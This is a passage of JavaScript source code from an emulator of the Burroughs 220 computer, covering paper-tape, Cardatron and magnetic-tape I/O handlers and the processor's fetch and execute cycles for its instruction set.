this.D.set(w*0x100 + d); // rotate D+sign left by two this.execClock += 0.060; // estimate for rotation this.DC.inc(); // increment DC for two digits this.DC.inc(); this.PA.set(d); if (this.DC.value >= 0x20) { this.EWT.set(1); } this.asyncOn(); printChar(d, this.boundConsoleOutputChar); } else { // Output numerically if (this.DPT.value && !this.LEADINGZEROESSW) { // decimal point may be needed d = this.CCONTROL >>> 12; if (this.DC.value + d > 0x19) { this.DPT.set(0); this.LT1.set(0); // stop any zero-suppression this.PA.set(0x03); // decimal point code this.asyncOn(); printChar(0x03, this.boundConsoleOutputChar); return; // early exit } } do { // suppress leading zeroes if necessary w = this.D.value % 0x10000000000; d = (this.D.value - w)/0x10000000000; // get a digit this.D.value = w*0x10 + d; // rotate D+sign left by one this.execClock += 0.065; // estimate for rotation this.DC.inc(); } while (d == 0 && this.LT1.value && this.DC.value < 0x20); this.LT1.set(0); this.D.set(this.D.value); d += 0x80; // translate numerically this.PA.set(d); if (this.DC.value >= 0x20) { this.EWT.set(1); } this.asyncOn(); printChar(d, this.boundConsoleOutputChar); } } }; /**************************************/ B220Processor.prototype.consoleOutputFinished = function consoleOutputFinished() { /* Handles the final cycle of console output */ this.asyncOff(); if (this.AST.value) { // if false, we've probably been cleared this.EWT.set(0); this.ioComplete(true); } }; /**************************************/ B220Processor.prototype.consoleInputFinishWord = function consoleInputFinishWord(result) { /* Finishes the receipt of a word from the Console paper tape reader and either stores it in memory or shunts it to the C register for execution. Updates the C register as necessary and decides whether to initiate receipt of another word. Note that this routine does not do asyncOff -- that is handled by the caller */ var d; var w; if (this.sDigit) { // decrement word count d = this.bcdAdd(this.CCONTROL, 0x990, 3); this.CCONTROL += d - this.CCONTROL%0x1000; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); } if (this.COP != 0x05) { // read normal: sign digit in normal position w = this.D.value%0x10000000000; d = (this.D.value - w)/0x10000000000; } else { // read inverse: permute the sign digit d = this.D.value%0x10; w = (this.D.value - d)/0x10; this.D.set(w + d*0x10000000000); if (d == 2) { // alphanumeric translation is invalid for inverse mode this.setPaperTapeCheck(1); this.ioComplete(true); return; // >>> ALARM ERROR EXIT <<< } } if (this.rDigit & d & 0x08) { // B-modify word before storing this.D.set(w + (d&0x07)*0x10000000000); this.IB.set(this.D.value - w%0x10000 + this.bcdAdd(w, this.B.value, 4)); this.C10.set(0); } else { // store word as-is this.IB.set(this.D.value); } if (this.rDigit == 1 && (d & 0x0E) == 0x06) { // control word to C register this.ioComplete(false); // terminate I/O but do not restart Processor yet this.fetch(true); // set up to execute control word // Schedule the Processor to give the reader a chance to finish its operation. setCallback(this.mnemonic, this, 0, this.schedule); } else { // just store the word this.writeMemory(); if (this.MET.value) { // memory address error this.ioComplete(true); } else if (this.sDigit && this.CCONTROL%0x1000 < 0x10) { // word count exhausted this.ioComplete(true); } else { // initiate input of another word this.D.set(0); this.asyncOn(); if (this.COP == 0x05) { d = this.console.inputUnitSelect(this.selectedUnit, this.boundConsoleInputInitiateInverse); } else { d = this.console.inputUnitSelect(this.selectedUnit, this.boundConsoleInputInitiateNormal); } if (d < 0) { // no unit available -- set alarm and quit this.setPaperTapeCheck(1); this.ioComplete(true); } } } }; /**************************************/ B220Processor.prototype.consoleInputInitiateNormal = function consoleInputInitiateNormal(result) { /* Initiates the receipt into a word of characters from the Console tape reader in normal (sign-first) mode. Increments the C register operand address, rotates the sign digit into the D register, and determines whether the word should be translated numerically or alphanumerically */ var code = result.code; this.asyncOff(); if (this.AST.value) { // if false, we've probably been cleared this.E.set(this.CADDR); this.C.inc(); this.CADDR = this.C.value%0x10000; switch (code) { case 0x17: // invalid character/parity error this.setPaperTapeCheck(1); this.ioComplete(true); break; case 0x35: // end-of-word this.consoleInputFinishWord(result); break; case 0x82: // sign=2, set alpha translation this.PZT.set(!this.HOLDPZTZEROSW); this.D.set(2); this.asyncOn(); result.readChar(this.boundConsoleInputReceiveChar); break; default: // anything else, set numeric translation this.PZT.set(0); if ((code & 0xF0) == 0x80) {// it's a numeric sign -- okay this.D.set(code%0x10); this.asyncOn(); result.readChar(this.boundConsoleInputReceiveChar); } else if (code == 0) { // we'll take a space as a zero this.D.set(0); this.asyncOn(); result.readChar(this.boundConsoleInputReceiveChar); } else { // sign is non-numeric -- invalid this.D.set(0); this.setPaperTapeCheck(1); this.ioComplete(true); } break; } // switch code } }; /**************************************/ B220Processor.prototype.consoleInputInitiateInverse = function consoleInputInitiateInverse(result) { /* Initiates the receipt into a word of characters from the Console tape reader in inverse (sign-last) mode. Increments the C register operand address, rotates the sign digit into the D register, and sets PZT for numeric translation */ var code = result.code; this.asyncOff(); if (this.AST.value) { // if false, we've probably been cleared this.E.set(this.CADDR); this.C.inc(); this.CADDR = this.C.value%0x10000; switch (code) { case 0x17: // invalid character/parity error this.setPaperTapeCheck(1); this.ioComplete(true); break; case 0x35: // end-of-word this.consoleInputFinishWord(result); break; default: // anything else, set numeric translation this.PZT.set(0); if ((code & 0xF0) == 0x80) {// it's a numeric code -- okay this.D.set(code%0x10); this.asyncOn(); result.readChar(this.boundConsoleInputReceiveChar); } else if (code == 0) { // we'll take a space as a zero this.D.set(0); this.asyncOn(); result.readChar(this.boundConsoleInputReceiveChar); } else { // digit is non-numeric -- invalid this.D.set(0); this.setPaperTapeCheck(1); this.ioComplete(true); } break; } // switch code } }; /**************************************/ B220Processor.prototype.consoleInputReceiveChar = function consoleInputReceiveChar(result) { /* Handles an input character coming from the Console paper-tape reader. result.code is the B220 character code read from the device. result.readChar is the callback function to request the next character. Data digits are rotated into the D register; end-of-word (0x35) codes are handled according to the sign digit in the D register */ var code = result.code; // character received var sign; // register sign digit var word; // register word less sign this.asyncOff(); if (this.AST.value) { // if false, we've probably been cleared switch (code) { case 0x17: // invalid character/parity error this.setPaperTapeCheck(1); this.ioComplete(true); break; case 0x35: // end-of-word this.consoleInputFinishWord(result); break; default: // anything else, accumulate digits in word if (this.PZT.value) { // alphanumeric translation this.D.set((this.D.value % 0x1000000000)*0x100 + code); this.asyncOn(); result.readChar(this.boundConsoleInputReceiveChar); } else { // numeric translation if ((code & 0xF0) == 0x80) {// it's a numeric code -- okay this.D.set((this.D.value % 0x10000000000)*0x10 + code%0x10); this.asyncOn(); result.readChar(this.boundConsoleInputReceiveChar); } else if (code == 0) { // we'll take a space as a zero this.D.set((this.D.value % 0x10000000000)*0x10); this.asyncOn(); result.readChar(this.boundConsoleInputReceiveChar); } else { // code is non-numeric -- invalid this.setPaperTapeCheck(1); this.ioComplete(true); } } break; } // switch code } }; /*********************************************************************** * Cardatron I/O Module * ***********************************************************************/ /**************************************/ B220Processor.prototype.cardatronOutputWord = function cardatronOutputWord() { /* Initiates a read of the next word from memory for output to the Cardatron Control Unit. Returns a negative number to stop transfer */ var word; this.asyncOff(); if (!this.AST.value) { // we've probably been cleared word = -1; } else if (this.MET.value) { // previous memory access error word = 0; } else { word = this.readMemory(); // address in E was previously set if (this.MET.value) { word = 0; } else { this.E.dec(); // step down to next memory address } this.execClock += 0.117; // time for full-word transfer } this.asyncOn(); return word; }; /**************************************/ B220Processor.prototype.cardatronOutputFinished = function cardatronOutputFinished() { /* Handles the final cycle of an I/O operation and restores this.execTime */ if (this.AST.value) { // if false, we've probably been cleared this.ioComplete(true); } }; /**************************************/ B220Processor.prototype.cardatronReceiveWord = function cardatronReceiveWord(word) { /* Handles a word coming from the Cardatron input unit. Negative values for the word indicates this is the last word and the I/O is finished. Otherwise, the word is stored into the D register and is handled according to the sign digit in the D register. The last word received (typically a "pusher" word of zeroes) is abandoned and not acted upon. Returns -1 if further data transfer is to be terminated, 0 otherwise */ var returnCode = 0; // default is to continue receiving var sign; // D-register sign digit this.asyncOff(); if (!this.AST.value) { // we've probably been cleared returnCode = -1; } else if (word < 0) { // Last word received -- finished with the I/O this.D.set(word-0x900000000000);// remove the finished signal; for display only, not stored this.ioComplete(true); returnCode = -1; } else if (this.MET.value) { // Memory error has occurred: just ignore further data from Cardatron this.asyncOn(); } else { // Full word accumulated -- process it and initialize for the next word this.D.set(word); word %= 0x10000000000; // strip the sign digit sign = (this.D.value - word)/0x10000000000; // get D-sign switch (sign) { case 0: // sign is 0-5: store word normally case 1: case 2: case 3: case 4: case 5: this.IB.set(this.D.value); this.writeMemory(); if (!this.MET.value) { this.E.dec(); // decrement memory address for next word } this.asyncOn(); break; case 6: // sign is 6, 7: execute control word case 7: if (this.vDigit & 0x01) { // input control words are inhibited this.IB.set(this.D.value); this.writeMemory(); // just store the word with its sign if (!this.MET.value) { this.E.dec(); // decrement memory address for next word } this.asyncOn(); } else { // input control words are executed this.IB.set(this.D.value); // move word to IB for use by fetch() this.ioComplete(false); // terminate I/O but do not restart Processor yet this.fetch(true); // set up to execute control word returnCode = -1; // stop further input from Cardatron // Schedule the Processor to give Cardatron a chance to finish its operation. setCallback(this.mnemonic, this, 0, this.schedule); } break; default: // sign is 8, 9: store word with optional B mod if (!(this.rDigit & 0x08)) { // no B-register modification this.IB.set(this.D.value); } else { // add B to low-order four digits of word word = word - word%0x10000 + this.bcdAdd(word, this.B.value, 4); this.C10.set(0); // reset carry toggle this.IB.set((sign%2)*0x10000000000 + word); } this.writeMemory(); if (!this.MET.value) { this.E.dec(); // decrement memory address for next word } this.asyncOn(); break; } // switch sign this.execClock += 0.117; // time for full-word transfer } return returnCode; }; /*********************************************************************** * Magnetic Tape I/O Module * ***********************************************************************/ /**************************************/ B220Processor.prototype.magTapeComplete = function magTapeComplete(control, word) { /* Call-back routine to signal completion of a magnetic tape operation. If this.AST is false, does nothing, as we have probably either been cleared or the Reset/Transfer switch has been activated. Otherwise, if "control" is true, the contents of "word" are processed as a tape control word and an appropriate branch is set up. Unconditionally terminates the tape I/O instruction. asyncOff() will be done by ioComplete() */ var aaaa = 0; // address where C & P will be stored var bbbb = 0; // address to load into P if (this.AST.value) { // if false, we've probably been cleared if (control) { this.D.set(word); bbbb = word%0x10000; aaaa = ((word - bbbb)/0x10000)%0x10000; if (word%0x20000000000 >= 0x10000000000) { // if sign bit is 1, bbbb = this.bcdAdd(bbbb, this.B.value, 4); // B-adjust the low-order 4 digits } this.E.set(aaaa); this.readMemory(); if (!this.MET.value) { this.IB.set(this.IB.value - this.IB.value%0x100000000 + (this.C.value%0x10000)*0x10000 + this.P.value%0x10000); this.writeMemory(); this.P.set(bbbb); } } Promise.resolve(true).then(this.boundIoComplete); } }; /**************************************/ B220Processor.prototype.magTapeSendWord = function magTapeSendWord(initialFetch) { /* Sends the next of data from memory to the tape control unit, starting at the current operand address in the C register. "initialFetch" is true if this call is the first to fetch words for a block. This causes the routine to save the current operand address in the control digits of C. Returns binary -1 if the processor has been cleared or a memory address error occurs, and the I/O must be aborted. Returns the BCD memory word otherwise */ var result; // return value this.asyncOff(); if (!this.AST.value) { result = -1; // we've probably been cleared } else { if (initialFetch) { this.CCONTROL = this.CADDR; // copy C address into control digits } this.E.set(this.CADDR); this.CADDR = this.bcdAdd(this.CADDR, 1, 4); this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address result = -1; } else { result = this.IB.value; this.D.set(result); } } this.asyncOn(); return result; }; /**************************************/ B220Processor.prototype.magTapeReceiveWord = function magTapeReceiveWord(initialStore, word) { /* Stores the next of data from the tape control unit to memory, starting at the current operand address in the C register. "initialStore" is true if this call is the first to store words for a block. This causes the routine to save the current operand address in the control digits of C. Returns binary -1 if the processor has been cleared or a memory address error occurs, and the I/O must be aborted. Returns 0 otherwise */ var result = 0; // return value var sign; // sign digit this.asyncOff(); if (!this.AST.value) { result = -1; // we've probably been cleared } else { if (initialStore) { this.CCONTROL = this.CADDR; // copy C address into control digits } this.E.set(this.CADDR); this.CADDR = this.bcdAdd(this.CADDR, 1, 4); this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); this.D.set(word); if (this.vDigit & 0x08) { // B-adjustment of words is enabled sign = (word - word%0x10000000000)/0x10000000000; if (sign & 0x08) { // this word is to be B-adjusted word = (sign&0x07)*0x10000000000 + word%0x10000000000 - word%0x10000 + this.bcdAdd(word, this.B.value, 4); this.C10.set(0); // reset carry toggle } } this.IB.set(word); this.writeMemory(); if (this.MET.value) { // invalid address result = -1; } } this.asyncOn(); return result; }; /*********************************************************************** * Fetch Module * ***********************************************************************/ /**************************************/ B220Processor.prototype.fetchWordToC = function fetchWordToC(word) { /* Transfers "word" to the C register, applying B-register modification if necessary */ var dSign = ((word - word%0x10000000000)/0x10000000000)%2; this.DST.set(dSign); this.CADDR = word%0x10000; // C address this.COP = (word%0x1000000 - this.CADDR)/0x10000; // C op code this.CCONTROL = (word%0x10000000000 - word%0x1000000)/0x1000000;// C control digits if (!dSign) { this.C.set(word%0x10000000000); } else { this.CADDR = this.bcdAdd(this.CADDR, this.B.value, 4); this.C10.set(0); // reset carry toggle this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); } }; /**************************************/ B220Processor.prototype.fetch = function fetch(entryP) { /* Implements the Fetch cycle of the 220 processor. This is initiated either by pressing START on the Console with EXT=0 (Fetch), pressing STEP on the Console when the computer is stopped and EXT=0, during I/O when a control word (sign 6,7) is received from a peripheral device, or by the prior Operation Complete if the processor is in continuous mode. The "entryP" parameter indicates whether the instruction word is already in IB (true) or must be fetched from the address in P first (false) */ var dSign; // sign bit of IB register var word; // instruction word if (entryP) { // if instruction already loaded word = this.IB.value; } else { // if doing normal fetch this.E.set(this.P.value); word = this.readMemory(); } if (!this.MET.value) { // (should set IB sign bit 1=0 here, but to reduce overhead we don't bother) this.fetchWordToC(word); this.D.set(word); // D contains a copy of memory word if (!entryP && !this.PCOUNTSW) { this.P.inc(); // if not doing I/O, bump the program counter } } // if we're not locked in Fetch, switch to Execute cycle next. if (!this.FETCHEXECUTELOCKSW) { this.EXT.set(1); } this.execClock += 0.090; // fetch uniformly requires 90 us }; /*********************************************************************** * Execute Module * ***********************************************************************/ /**************************************/ B220Processor.prototype.execute = function execute() { /* Implements the Execute cycle of the 220 processor. This is initiated either by pressing START on the console with the EXT=1 (Execute), or by the prior Operation Complete if the processor is in automatic mode */ var d; // scratch digit var w; // scratch word var x; // scratch variable or counter w = this.C.value; this.CCONTROL = (w - w%0x1000000)/0x1000000; // C register control digits this.COP = (w%0x1000000 - w%0x10000)/0x10000; // C register operation code this.CADDR = w%0x10000; // C register operand address this.opTime = 0; // clear the current instruction timer ++this.instructionCount; if (this.OFT.value && this.HCT.value && this.COP != 0x31) { this.setStop(); // if overflow and SOH and instruction is not BOF, stop return; // do not go through Operation Complete } this.E.set(0); this.IB.set(0); switch (this.COP) { case 0x00: //--------------------- HLT Halt this.setStop(); this.opTime = 0.010; this.operationComplete(); break; case 0x01: //--------------------- NOP No operation this.opTime = 0.010; this.operationComplete(); break; case 0x03: //--------------------- PRD Paper tape read this.opTime = 0.185; // just a guess... d = this.CCONTROL >>> 12; // get unit number if (d == 0) { d = 10; // xlate unit 0 to unit 10 } this.selectedUnit = d; this.rDigit = this.CCONTROL%0x10; this.sDigit = 1; // use word count in C (32) this.D.set(0); this.ioInitiate(); d = this.console.inputUnitSelect(this.selectedUnit, this.boundConsoleInputInitiateNormal); if (d < 0) { // no unit available -- set alarm and quit this.setPaperTapeCheck(1); this.ioComplete(true); } break; case 0x04: //--------------------- PRB Paper tape read, branch this.opTime = 0.185; // just a guess... d = this.CCONTROL >>> 12; // get unit number if (d == 0) { d = 10; // xlate unit 0 to unit 10 } this.selectedUnit = d; this.rDigit = (this.CCONTROL & 0x0E) | 1; // force recognition of control words this.sDigit = 0; // do not use word count in C (32) this.D.set(0); this.ioInitiate(); d = this.console.inputUnitSelect(this.selectedUnit, this.boundConsoleInputInitiateNormal); if (d < 0) { // no unit available -- set alarm and quit this.setPaperTapeCheck(1); this.ioComplete(true); } break; case 0x05: //--------------------- PRI Paper tape read, inverse format this.opTime = 0.185; // just a guess... d = this.CCONTROL >>> 12; // get unit number if (d == 0) { d = 10; // xlate unit 0 to unit 10 } this.selectedUnit = d; this.rDigit = (this.CCONTROL & 0x0E) | 1; // force recognition of control words this.sDigit = 1; // use word count in C (32) this.D.set(0); this.ioInitiate(); d = this.console.inputUnitSelect(this.selectedUnit, this.boundConsoleInputInitiateInverse); if (d < 0) { // no unit available -- set alarm and quit this.setPaperTapeCheck(1); this.ioComplete(true); } break; case 0x06: //--------------------- PWR Paper tape write this.opTime = 0.185; // just a guess... d = this.CCONTROL >>> 12; // get unit number if (d == 0) { d = 10; // xlate unit 0 to unit 10 } this.selectedUnit = d; this.ioInitiate(); d = this.console.outputUnitSelect(d, this.boundConsoleOutputSign); if (d < 0) { // no unit available -- set alarm and quit this.setPaperTapeCheck(1); this.ioComplete(true); } break; case 0x07: //--------------------- PWI Paper tape write interrogate, branch d = this.CCONTROL >>> 12; // get unit number if (d == 0) { d = 10; // xlate unit 0 to unit 10 } this.selectedUnit = d; d = this.console.outputUnitSelect(d, B220Processor.emptyFunction); if (d < 0) { // if not ready, continue in sequence this.opTime = 0.015; } else { // if ready, branch to operand address this.P.set(this.CADDR); this.opTime = 0.035; } this.operationComplete(); break; case 0x08: //--------------------- KAD Keyboard add this.opTime = 0.005; this.D.set(0); this.setStop(); this.operationComplete(); break; case 0x09: //--------------------- SPO Supervisory print-out this.opTime = 0.185; // just a guess... this.ioInitiate(); d = this.console.outputUnitSelect(0, this.boundConsoleOutputSign); if (d < 0) { // no unit available -- set alarm and quit this.setPaperTapeCheck(1); this.ioComplete(true); } break; case 0x10: //--------------------- CAD/CAA Clear add/add absolute this.SUT.set(0); this.clearAdd(this.CCONTROL % 0x10 == 1); this.operationComplete(); break; case 0x11: //--------------------- CSU/CSA Clear subtract/subtract absolute this.SUT.set(1); this.clearAdd(this.CCONTROL % 0x10 == 1); this.operationComplete(); break; case 0x12: //--------------------- ADD/ADA Add/add absolute this.SUT.set(0); this.integerAdd(this.CCONTROL % 0x10 == 1, false); this.operationComplete(); break; case 0x13: //--------------------- SUB/SUA Subtract/subtract absolute this.SUT.set(1); this.integerAdd(this.CCONTROL % 0x10 == 1, false); this.operationComplete(); break; case 0x14: //--------------------- MUL Multiply this.integerMultiply(); this.operationComplete(); break; case 0x15: //--------------------- DIV Divide this.integerDivide(); this.operationComplete(); break; case 0x16: //--------------------- RND Round this.opTime = 0.015; // minimum instruction timing this.SUT.set(0); w = this.A.value%0x10000000000; this.SGT.set(((this.A.value - w)/0x10000000000)%2); if (this.R.value%0x10000000000 >= 0x5000000000) { // Add round-off (as the carry bit) to absolute value of A. this.A.value -= w; // preserve the A sign digit w = this.bcdAdd(w, 0, 11, 0, 1); if (w >= 0x10000000000) { this.OFT.set(1); // overflow occurred w -= 0x10000000000; // remove the overflow bit from A } this.A.set(this.A.value + w); // restore the A sign digit this.opTime += 0.060; // account for add cycle } this.R.set(0); // unconditionally clear R this.operationComplete(); break; case 0x17: //--------------------- EXT Extract this.integerExtract(); this.operationComplete(); break; case 0x18: //--------------------- CFA/CFR Compare field A/R this.compareField(); this.operationComplete(); break; case 0x19: //--------------------- ADL Add to location this.SUT.set(0); this.integerAdd(false, true); // result to D register this.IB.set(this.D.value); this.writeMemory(); // E still contains the operand address this.opTime += 0.70; // additional time over standard ADD this.operationComplete(); break; case 0x20: //--------------------- IBB Increase B, branch w = this.B.value; this.B.add(this.CCONTROL); if (this.B.value < w) { this.opTime = 0.040; } else { this.P.set(this.CADDR); this.opTime = 0.060; } this.operationComplete(); break; case 0x21: //--------------------- DBB Decrease B, branch w = this.B.value; this.B.sub(this.CCONTROL); if (this.B.value > w) { this.opTime = 0.040; } else { this.P.set(this.CADDR); this.opTime = 0.060; } this.operationComplete(); break; case 0x22: //--------------------- FAD/FAA Floating add/add absolute this.SUT.set(0); this.floatingAdd(this.CCONTROL % 0x10 == 1); this.operationComplete(); break; case 0x23: //--------------------- FSU/FSA Floating subtract/subtract absolute this.SUT.set(1); this.floatingAdd(this.CCONTROL % 0x10 == 1); this.operationComplete(); break; case 0x24: //--------------------- FMU Floating multiply this.floatingMultiply(); this.operationComplete(); break; case 0x25: //--------------------- FDV Floating divide this.floatingDivide(0); this.operationComplete(); break; case 0x26: //--------------------- IFL Increase field location this.increaseFieldLocation(); this.operationComplete(); break; case 0x27: //--------------------- DFL Decrease field location this.decreaseFieldLocation(false); this.operationComplete(); break; case 0x28: //--------------------- DLB Decrease field location, load B this.decreaseFieldLocation(true); this.operationComplete(); break; case 0x29: //--------------------- RTF Record transfer this.opTime = 0.040; do { d = this.bcdAdd(this.CCONTROL, 0x990, 3); // decrement word count this.CCONTROL += d - this.CCONTROL%0x1000; this.E.set(this.CADDR); this.CADDR = this.bcdAdd(this.CADDR, 1, 4); // increment source address this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address break; // out of do loop } else { this.E.set(this.B.value); this.B.inc(); // increment destination address this.opTime += 0.060; this.writeMemory(); if (this.MET.value) { break; // out of do loop } } } while (this.CCONTROL%0x1000 > 0x00F); this.operationComplete(); break; case 0x30: //--------------------- BUN Branch, unconditionally this.opTime = 0.035; this.P.set(this.CADDR); this.operationComplete(); break; case 0x31: //--------------------- BOF Branch, overflow this.opTime = 0.015; if (this.OFT.value) { this.P.set(this.CADDR); this.OFT.set(0); this.opTime += 0.020; } this.operationComplete(); break; case 0x32: //--------------------- BRP Branch, repeat this.opTime = 0.015; if (this.RPT.value) { this.P.set(this.CADDR); this.RPT.set(0); this.opTime += 0.020; } this.operationComplete(); break; case 0x33: //--------------------- BSA Branch, sign A this.opTime = 0.085; this.SUT.set(1); if ((this.A.value - this.A.value%0x10000000000)/0x10000000000 == this.CCONTROL%0x10) { this.P.set(this.CADDR); this.opTime += 0.020; } this.operationComplete(); break; case 0x34: //--------------------- BCH/BCL Branch, comparison high/low this.opTime = 0.015; if (this.UET.value) { if (this.HIT.value) { // HIGH condition if (this.CCONTROL%0x10 != 1) { // BCH -- test for high condition this.P.set(this.CADDR); this.opTime += 0.020; } } else { // LOW condition if (this.CCONTROL%0x10 == 1) { // BCL -- test for low condition this.P.set(this.CADDR); this.opTime += 0.020; } } } else { if (this.HIT.value) { // EQUAL condition // continue in sequence } else { // no condition is set this.setProgramCheck(1); } } this.operationComplete(); break; case 0x35: //--------------------- BCE/BCU Branch, comparison equal/unequal this.opTime = 0.015; if (this.UET.value) { // UNEQUAL condition if (this.CCONTROL%0x10 == 1) { // BCU -- test for unequal condition this.P.set(this.CADDR); this.opTime += 0.020; } else { // continue in sequence } } else { if (this.HIT.value) { // EQUAL condition if (this.CCONTROL%0x10 != 1) { // BCE -- test for equal condition this.P.set(this.CADDR); this.opTime += 0.020; } } else { // no condition is set this.setProgramCheck(1); } } this.operationComplete(); break; case 0x36: //--------------------- BFA Branch, field A this.branchField(this.A.value); this.operationComplete(); break; case 0x37: //--------------------- BFR Branch, field R this.branchField(this.R.value); this.operationComplete(); break; case 0x38: //--------------------- BCS Branch, control switch this.opTime = 0.015; // minimum instruction timing d = (this.CCONTROL - this.CCONTROL%0x1000)/0x1000; if (this["PC" + d.toString() + "SW"]) { this.opTime += 0.020; this.P.set(this.CADDR); } this.operationComplete(); break; case 0x39: //--------------------- SOR/SOH/IOM Set overflow remember/halt, Interrogate overflow mode // Note: it's not clear what should happen if the variant digit (41) is // other than 0, 1, or 2. We assume the digit is used as a bit mask. this.opTime = 0.015; switch (true) { case (this.CCONTROL & 0x02) == 0x02: // IOM: Interrogate overflow mode if (this.HCT.value) { this.P.set(this.CADDR); this.opTime += 0.020; } break; case (this.CCONTROL & 0x01) == 0x01: // SOH: Set overflow halt this.HCT.set(1); if (this.OFT.value) { this.setStop(); } break; default: // SOR: Set overflow remember this.HCT.set(0); break; } this.operationComplete(); break; case 0x40: //--------------------- ST* Store A/R/B this.storeRegister(); this.operationComplete(); break; case 0x41: //--------------------- LDR Load R this.opTime = 0.085; this.E.set(this.CADDR); this.readMemory(); if (!this.MET.value) { this.D.set(this.IB.value); this.R.set(this.IB.value); } this.operationComplete(); break; case 0x42: //--------------------- LDB/LBC Load B/B complement this.opTime = 0.090; this.E.set(this.CADDR); this.readMemory(); if (!this.MET.value) { this.D.set(this.IB.value); if (this.CCONTROL%0x10 == 1) { // Load B complement this.B.set(this.bcdAdd(this.IB.value, 0, 4, 1, 1)); } else { // Load B this.B.set(this.IB.value%0x10000); } } this.operationComplete(); break; case 0x43: //--------------------- LSA Load sign A this.opTime = 0.015 this.A.set(this.A.value%0x10000000000 + (this.CCONTROL%0x10)*0x10000000000); this.operationComplete(); break; case 0x44: //--------------------- STP Store P this.opTime = 0.095; this.E.set(this.CADDR); this.readMemory(); if (!this.MET.value) { this.IB.set(this.IB.value - this.IB.value%0x10000 + this.bcdAdd(this.P.value, 1, 4)); this.D.set(this.IB.value); this.writeMemory(); } this.operationComplete(); break; case 0x45: //--------------------- CL* Clear A/R/B this.opTime = 0.010; if (this.CCONTROL & 0x01) { this.A.set(0); } if (this.CCONTROL & 0x02) { this.R.set(0); } if (this.CCONTROL & 0x04) { this.B.set(0); } this.operationComplete(); break; case 0x46: //--------------------- CLL Clear location this.opTime = 0.025; this.E.set(this.CADDR); this.writeMemory(); // IB is still zero this.operationComplete(); break; case 0x48: //--------------------- SR* Shift right A/A and R/A with sign x = B220Processor.bcdBinary(this.CADDR % 0x20); this.opTime = 0.020 + x*0.005; this.DC.set(B220Processor.binaryBCD(20-x)); switch (this.CCONTROL%0x10) { case 1: // SRT: Shift Right A and R w = this.A.value % 0x10000000000; // A sign is not affected this.R.value %= 0x10000000000; // discard the R sign while (this.DC.value < 0x20) { d = w % 0x10; w = (w-d)/0x10; this.R.value = (this.R.value - this.R.value%0x10)/0x10 + d*0x1000000000; this.DC.inc(); } this.R.set(this.A.value - this.A.value%0x10000000000 + this.R.value); // copy A sign into R this.A.set(this.A.value - this.A.value%0x10000000000 + w); // restore the A sign break; case 2: // SRS: Shift Right A with Sign w = this.A.value % 0x100000000000; // A sign is included while (this.DC.value < 0x20) { d = w % 0x10; w = (w-d)/0x10; this.DC.inc(); } this.A.set(w); break; default: // SRA: Shift Right A w = this.A.value % 0x10000000000; // A sign is not affected while (this.DC.value < 0x20) { d = w % 0x10; w = (w-d)/0x10; this.DC.inc(); } this.A.set(this.A.value - this.A.value%0x10000000000 + w); // restore the A sign break; } // switch on control digit this.operationComplete(); break; case 0x49: //--------------------- SL* Shift (rotate) left A/A and R/A with sign switch (this.CCONTROL%0x10) { case 1: // SLT: Shift Left A and R x = this.CADDR % 0x20; if (x < 0x10) { this.opTime = 0.210 - x*0.005; } else { this.opTime = 0.160 - (x-0x10)*0.005; } this.DC.set(x); w = this.R.value % 0x10000000000; // R sign is not affected this.A.value %= 0x10000000000; // discard the A sign while (this.DC.value < 0x20) { d = w % 0x10; w = (w-d)/0x10 + (this.A.value%0x10)*0x1000000000; this.A.value = (this.A.value - this.A.value%0x10)/0x10 + d*0x1000000000; this.DC.inc(); } this.A.set(this.R.value - this.R.value%0x10000000000 + this.A.value); // copy R sign into A this.R.set(this.R.value - this.R.value%0x10000000000 + w); // restore the R sign break; case 2: // SLS: Shift Left A with Sign x = this.CADDR % 0x10; this.opTime = 0.160 - x*0.005; this.DC.set(0x10+x); w = this.A.value % 0x100000000000; // A sign is included d = w % 0x10; // do one more rotate right w = (w-d)/0x10 + d*0x10000000000; // than the count calls for while (this.DC.value < 0x20) { d = w % 0x10; w = (w-d)/0x10 + d*0x10000000000; this.DC.inc(); } this.A.set(w); break; default: // SLA: Shift Left A x = this.CADDR % 0x10; this.opTime = 0.160 - x*0.005; this.DC.set(0x10+x); w = this.A.value % 0x10000000000; // A sign is not affected while (this.DC.value < 0x20) { d = w % 0x10; w = (w-d)/0x10 + d*0x1000000000; this.DC.inc(); } this.A.set(this.A.value - this.A.value%0x10000000000 + w); // restore the A sign break; } // switch on control digit this.operationComplete(); break; case 0x50: //--------------------- MTS/MFS/MLS/MRW/MDA Magnetic tape search/field search/lane select/rewind this.opTime = 0.160; if (!this.magTape) { this.setMagneticTapeCheck(true); // no tape control this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.vDigit = this.CCONTROL%0x10; this.ioInitiate(); if (this.vDigit & 0x08) { // MRW/MDA: rewind, with or without lockout this.magTape.rewind(this.D.value); } else if (this.vDigit & 0x04) { // MLS: lane select this.magTape.laneSelect(this.D.value); } else { // MTS/MFS: search or field search if (this.D.value%0x80000000000 < 0x40000000000) { // sign 4-bit = 0: full-word search this.magTape.search(this.D.value, 0); } else { // partial-word search based on sL00 in B this.magTape.search(this.D.value, this.B.value); } } } break; case 0x51: //--------------------- MTC/MFC Magnetic tape scan/field scan this.opTime = 0.160; if (!this.magTape) { this.setMagneticTapeCheck(true); // no tape control this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.ioInitiate(); if (this.D.value%0x80000000000 < 0x40000000000) { // sign 4-bit = 0: full-word search this.magTape.scan(this.D.value, 0); } else { // partial-word search based on sL00 in B this.magTape.scan(this.D.value, this.B.value); } } break; case 0x52: //--------------------- MRD Magnetic tape read this.opTime = 0.160; if (!this.magTape) { this.setMagneticTapeCheck(true); // no tape control this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.vDigit = this.CCONTROL%0x10; // controlword and B-mod bits this.ioInitiate(); this.magTape.read(this.D.value, false); } break; case 0x53: //--------------------- MRR Magnetic tape read, record this.opTime = 0.160; if (!this.magTape) { this.setMagneticTapeCheck(true); // no tape control this.operationComplete(); } else { this.selectedUnit = (this.CCONTROL >>> 12)%0x10; this.vDigit = this.CCONTROL%0x10; // controlword and B-mod bits 